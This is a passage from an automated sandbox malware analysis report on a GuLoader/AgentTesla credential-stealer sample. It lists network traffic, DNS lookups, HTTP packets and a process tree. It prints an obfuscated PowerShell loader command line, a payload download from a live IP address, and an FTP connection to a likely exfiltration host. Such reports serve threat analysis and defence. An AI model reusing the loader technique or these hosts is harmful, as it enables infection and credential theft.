                                        Sep 25, 2024 12:35:49.705497026 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705502033 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705539942 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705792904 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705845118 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705847979 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705893040 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705898046 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705933094 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705946922 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.705966949 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.705974102 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706011057 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706423998 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706458092 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706479073 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706492901 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706500053 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706526995 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706537008 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706562996 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706572056 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706598997 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.706604004 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.706648111 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707082033 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707189083 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707271099 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707304001 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707334995 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707339048 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707360983 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707372904 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707396984 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707421064 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707432032 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707456112 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707472086 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707493067 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.707505941 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.707537889 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.708492041 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.708524942 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.708548069 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.708556890 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.708559036 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.708595037 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.708604097 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.708645105 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716367006 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716429949 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716430902 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716460943 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716473103 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716506004 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716512918 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716547012 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716558933 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716581106 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716597080 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716615915 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716625929 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716655970 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716877937 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716911077 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716931105 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716944933 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716953993 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.716979980 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.716990948 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717020035 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717263937 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.717297077 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.717315912 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717330933 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.717341900 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717365980 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.717374086 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717401028 CEST8049737185.29.11.53192.168.2.4
                                        Sep 25, 2024 12:35:49.717406988 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:49.717451096 CEST4973780192.168.2.4185.29.11.53
                                        Sep 25, 2024 12:35:50.036988020 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.037049055 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.037111998 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.050549984 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.050570011 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.512327909 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.512413979 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.514339924 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.514352083 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.514677048 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.562341928 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.737133026 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.779403925 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.840887070 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.841284990 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.841370106 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.864151955 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:52.512583017 CEST4973921192.168.2.4192.185.13.234
                                        Sep 25, 2024 12:35:52.518481970 CEST2149739192.185.13.234192.168.2.4
                                        Sep 25, 2024 12:35:52.518573046 CEST4973921192.168.2.4192.185.13.234
                                        Sep 25, 2024 12:35:52.520402908 CEST4973921192.168.2.4192.185.13.234
                                        Sep 25, 2024 12:35:52.525293112 CEST2149739192.185.13.234192.168.2.4
                                        Sep 25, 2024 12:35:52.525358915 CEST4973921192.168.2.4192.185.13.234

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 25, 2024 12:35:50.022074938 CEST4958353192.168.2.41.1.1.1
                                        Sep 25, 2024 12:35:50.030332088 CEST53495831.1.1.1192.168.2.4
                                        Sep 25, 2024 12:35:52.165589094 CEST5041453192.168.2.41.1.1.1
                                        Sep 25, 2024 12:35:52.509350061 CEST53504141.1.1.1192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Sep 25, 2024 12:35:50.022074938 CEST192.168.2.41.1.1.10x782cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Sep 25, 2024 12:35:52.165589094 CEST192.168.2.41.1.1.10xc1cfStandard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Sep 25, 2024 12:35:50.030332088 CEST1.1.1.1192.168.2.40x782cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                        Sep 25, 2024 12:35:50.030332088 CEST1.1.1.1192.168.2.40x782cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                        Sep 25, 2024 12:35:50.030332088 CEST1.1.1.1192.168.2.40x782cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                        Sep 25, 2024 12:35:52.509350061 CEST1.1.1.1192.168.2.40xc1cfNo error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                        Sep 25, 2024 12:35:52.509350061 CEST1.1.1.1192.168.2.40xc1cfNo error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • api.ipify.org
                                        • 185.29.11.53

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449737185.29.11.53802124C:\Program Files (x86)\Windows Mail\wabmig.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 25, 2024 12:35:48.694613934 CEST177OUTGET /bIGuEflfnZjESw74.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: 185.29.11.53
                                        Cache-Control: no-cache
                                        Sep 25, 2024 12:35:49.297199011 CEST1236INHTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Last-Modified: Wed, 25 Sep 2024 08:57:18 GMT
                                        Accept-Ranges: bytes
                                        ETag: "255312ed28fdb1:0"
                                        Server: Microsoft-IIS/8.5
                                        Date: Wed, 25 Sep 2024 10:35:47 GMT
                                        Content-Length: 241728
                                        Data Raw: e2 5b 6d a6 6d 48 1f 83 31 45 b6 0f a8 a3 a6 12 af ce 14 f1 6e 4d 75 e6 c0 cd 0b d3 a3 de fa 28 3b 05 e8 2e 4e a2 0b 2f 52 d7 2e 67 51 cd c6 04 ec 97 16 dd 07 70 6d 96 9d 65 88 27 ca d1 8b de fb 20 db 23 10 6e 40 d5 02 5e 88 6e 89 62 50 97 54 fa 66 63 4d 19 b2 9a c3 6b d8 34 c2 ca 9a b3 ef 1b e1 bf e6 2f 01 d0 b4 42 8d 54 e8 4e 23 9f db cf 05 48 b6 c8 0f 86 d2 ed 67 ff 35 30 2c b3 cc 76 8c 31 52 5e 3c d6 a1 ef 60 a3 c2 80 78 8c cb 2a c1 71 c3 c3 41 38 81 89 5a 84 1d b3 9d 3f 55 fd 66 ce 70 b0 8a 12 48 2c 9d 04 28 83 e5 0a 19 f8 d6 56 e3 15 98 70 11 d7 37 d8 5e de 41 4f 42 98 8e 84 0d 9a 5e ad 7f 72 64 d9 e7 64 ad fc 39 4b b8 21 25 cd f8 15 9e f9 f3 6c 11 d5 30 fe a6 b9 b2 2a 25 84 4d b3 82 50 32 3e a8 e9 3f 3d f9 28 80 0d ba 81 e1 ef cf 0b eb 07 93 70 76 d4 88 43 2b 53 ae f3 f8 3f 68 79 fe 3b bc 56 4b 08 3e 61 fd 8a 45 cf 65 6a e7 96 45 47 8c c4 2d aa 7a 45 cf 8b 9e 54 ea 16 99 6e 7b 7e 13 56 73 86 82 cb 89 2d 8a 32 f0 75 44 20 ef ab f0 59 7a fd 93 c9 43 d9 09 60 0e 22 56 35 97 41 ee 31 74 d2 b4 3e [TRUNCATED]
                                        Data Ascii: [mmH1EnMu(;.N/R.gQpme' #n@^nbPTfcMk4/BTN#Hg50,v1R^<`x*qA8Z?UfpH,(Vp7^AOB^rdd9K!%l0*%MP2>?=(pvC+S?hy;VK>aEejEG-zETn{~Vs-2uD YzC`"V5A1t>I$GAgK?D(5~>#=C 4x}$PTIIRj_w]4-j+3?(Is[Xqb*yjtk3?r4c206F.XgG3=#/uh3xt{ l:YIu[8*.7)pyum_SP0:59[U?K'HN6d8tT*%uo^5{D"~]:E&z3*(Hpg?"Y|zzniLc(3-BaV6jBcnmb%xwPvt#KM%,"dg\6rSr`2uHjLsw{)IqEzy}~z=y}!](X(P_x-u[U-5b?)KNK!VVGn%}md[B6>Zn9Pq6G]D>*dv8
                                        Sep 25, 2024 12:35:49.297240019 CEST224INData Raw: b8 f6 ab b8 29 a5 91 be 89 ed 43 85 cb 7a 9b 36 1d 89 a3 c4 88 f0 74 1d 09 b6 35 0f 86 be d0 47 67 e4 ae 44 2d db 67 af b2 d6 70 34 9a c8 c4 58 cc e2 26 26 28 44 19 17 0d 77 00 2a 5d 87 5e 5e 4a 5b 9d de dd a9 89 35 ed d6 2a 65 1a 30 2a b1 c0 db
                                        Data Ascii: )Cz6t5GgD-gp4X&&(Dw*]^^J[5*e0*SnKuL(&a[WN)+8)NK-hGK#1#?u+p&poeE!oK",-L@>ZS<.8\P
                                        Sep 25, 2024 12:35:49.297278881 CEST1236INData Raw: ea 5f 0f e5 dc a6 65 6d be db 94 d8 a9 3e 24 e7 dd 33 cd 7f 2b 2b 46 40 ca 25 70 be 82 5e 75 1b e1 be 24 81 95 32 7a db 2e 04 9a 33 90 d5 09 f8 1d 4e 9d 66 d4 4f a8 84 41 94 9a 45 fc 78 e8 b4 75 10 19 c9 62 2d 7e 70 7f 98 1d 58 1e f5 d3 1f d9 2d
                                        Data Ascii: _em>$3++F@%p^u$2z.3NfOAExub-~pX-[9i#^0z.(;'9l;XR4~[og["#RK/q-z_U6:faV&m:.-G|'C#!%6kE/My~{A?
                                        Sep 25, 2024 12:35:49.297312975 CEST224INData Raw: f0 86 f6 28 81 bf b0 c2 19 b8 23 63 a2 bd c7 f1 b5 24 1f 1c ab c9 a6 94 7b 4f 9a fe 94 f2 45 64 99 30 bb 2d df cd e5 b0 fe e3 b4 9a 3d c6 2a 4c 4e 26 d6 00 cf 98 17 0b 5d 9e d7 26 98 5e a1 4e f1 3f 5c de 81 78 54 8f be 65 0f 6c 77 19 c3 a5 a2 67
                                        Data Ascii: (#c${OEd0-=*LN&]&^N?\xTelwg*7V$ltMR"SUDy(.}+7<lJ'\@u/AGpV5EE'{jIkK"rZkg##K-4S<,
                                        Sep 25, 2024 12:35:49.297343969 CEST1236INData Raw: 5a 0f 8d f6 c5 18 c9 b4 fb 90 f2 b3 3c 00 54 23 32 df ab 08 03 0f 15 0f 25 70 b0 88 40 77 62 47 e1 32 7b be 06 86 d9 79 e0 85 27 bc dc 17 fa 60 fe c2 70 2e 64 9c 78 43 c3 23 47 87 06 c2 aa 73 41 93 cb 61 54 2e 52 7d 9f 4a ba 1c dd a3 35 c7 25 22
                                        Data Ascii: Z<T#2%p@wbG2{y'`p.dxC#GsAaT.R}J5%"i^\|#Bc#^LUt0s6nNpbauP"';r;I0cHFs'?fU_*)>, EhFA66K5Q?1C2
                                        Sep 25, 2024 12:35:49.297379971 CEST1236INData Raw: ae 94 32 ab ac b6 e8 45 b8 79 f2 8b bd b1 db b3 58 47 1b 81 d3 a6 eb 98 16 9b fa ba fa 59 65 9f f6 ba 2d df cd a5 a4 fc ee b6 b2 10 c6 58 ca 48 70 a4 00 e3 9b 17 0b 75 83 fd 69 05 5e a7 48 df 35 78 df fc e1 7e ed a5 46 47 46 6e 08 c3 a3 f0 67 51
                                        Data Ascii: 2EyXGYe-XHpui^H5x~FGFngQ47 'ltlMS,*u|-=GNH:/=%-AL!5xjsDp"7/GO[/MZN;cR.`.Si$a;"2$
                                        Sep 25, 2024 12:35:49.297415972 CEST448INData Raw: 34 2e b7 da 13 b6 26 51 af 99 a4 85 41 0c 05 fc c9 aa 63 49 5d 51 b3 3f 6f d2 ae 85 ce c0 24 a6 b1 c2 3e ab 66 e4 d2 a1 d4 48 23 1d 55 b7 d6 f3 cc d3 be 0e 53 05 f1 3b 70 d4 a2 f1 fc e2 d8 9f 33 9a 6d b7 7b 29 81 0a da a4 ed a0 0a e1 85 f5 48 97
                                        Data Ascii: 4.&QAcI]Q?o$>fH#US;p3m{)HqelQdzMgO_(c(-x:LP6.-W$SY/t3A^&FfInGIRV9=B^h$/}BGCmQUm
                                        Sep 25, 2024 12:35:49.374283075 CEST1236INData Raw: af dc d0 65 6d be 05 9a dc ad c0 76 f5 23 40 ce 81 2a 71 24 7f aa 25 7a 16 5c 52 76 19 c1 e5 32 7f 94 56 e7 da 04 36 27 d9 b4 f5 09 d0 03 59 c2 7a 58 21 be 7a 30 96 8d 47 87 04 16 bd 71 3a 49 b6 61 50 74 58 62 9c 37 18 34 ce a5 1f df fa db 4a 94
                                        Data Ascii: emv#@*q$%z\Rv2V6'YzX!z0Gq:IaPtXb74JiQ\xfm"j}BfZp1GIf%."1PKu@QOBYg,BtYV(h$i84Ej#J*%6IG,y1,g
                                        Sep 25, 2024 12:35:49.374325037 CEST1236INData Raw: 2a a3 52 bd c7 13 92 65 ea 89 b7 8d ba 4f da e0 c7 91 d7 a4 ef 1b 42 9f fa 40 c6 41 67 e4 b5 d4 0b db e7 a5 6e 28 fc b5 9a 58 f1 58 cc 68 d8 a8 2e c4 a1 d7 0d 77 80 2b 50 01 5e 89 7c db 1d 54 23 f2 e3 54 71 b6 4b 45 15 6e 0b c3 a1 88 62 79 c6 36
                                        Data Ascii: *ReOB@Agn(XXh.w+P^|T#TqKEnby6$|`&qbSaPN/yL@)/3/65~ku/A/g7pE)x;*_N7fP#.$^eSw#*$
                                        Sep 25, 2024 12:35:49.374363899 CEST448INData Raw: a0 fa 13 b6 06 5e 51 98 9d 02 74 0c 05 fd 17 a5 62 49 7d ad bd 3d 6f 2c 5e 8a cc c0 fa a8 b2 c2 1e 51 67 dd d7 5f d5 71 03 18 55 b7 28 c7 d2 2c 61 f3 79 1e c1 4c 77 83 a0 81 5e c1 dd 9f 22 ba 93 b9 78 29 7f fa d1 a7 d5 de 06 e1 85 f5 48 9a 37 69
                                        Data Ascii: ^QtbI}=o,^Qg_qU(,ayLw^"x)H7iEl4{R@w=9r}'cXP!MPo.-QQZy=q4i32_R+F^&n]HHjgG1cYH$|/)Q+%
                                        Sep 25, 2024 12:35:49.374408007 CEST1236INData Raw: c1 65 6d b0 89 df da ad 4e 53 ec 23 32 d1 7f 24 01 0c 48 be 25 70 b4 5c 50 76 19 e1 1f 3e 7c 94 04 8e da 04 46 7b 26 81 ee 09 f8 1b a7 ce 71 2a 6e b6 7a 40 be f6 08 85 02 98 16 51 31 3b cb 61 ae 0a 73 7f 9c c9 1e 1f dd 87 19 d9 27 59 b4 95 50 95
                                        Data Ascii: emNS#2$H%p\Pv>|F{&q*nz@Q1;as'YP/U||0=cW^j;NrA4^Jso_hqD"'|J/u1By%BH}e&$i8>X(f;+*%6%KG*0yzj,oj6


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449738172.67.74.1524432124C:\Program Files (x86)\Windows Mail\wabmig.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-25 10:35:50 UTC155OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                        Host: api.ipify.org
                                        Connection: Keep-Alive
                                        2024-09-25 10:35:50 UTC211INHTTP/1.1 200 OK
                                        Date: Wed, 25 Sep 2024 10:35:50 GMT
                                        Content-Type: text/plain
                                        Content-Length: 11
                                        Connection: close
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 8c8a5eaa6cbe1869-EWR
                                        2024-09-25 10:35:50 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                        Data Ascii: 8.46.123.33


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:06:34:34
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:06:34:34
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:06:34:34
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
                                        Imagebase:0xca0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:06:34:39
                                        Start date:25/09/2024
                                        Path:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        Wow64 process (32bit):true
                                        Commandline:"E:\Documenti di spedizione 0009333000459595995.exe"
                                        Imagebase:0x400000
                                        File size:748'488 bytes
                                        MD5 hash:6C446FD0A3F6D498F5CBD0725CE7F232
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:06:34:40
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"
                                        Imagebase:0xca0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2470285181.0000000009291000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:06:34:40
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:06:35:39
                                        Start date:25/09/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
                                        Imagebase:0x660000
                                        File size:66'048 bytes
                                        MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:false

                                        Disassembly

                                        No disassembly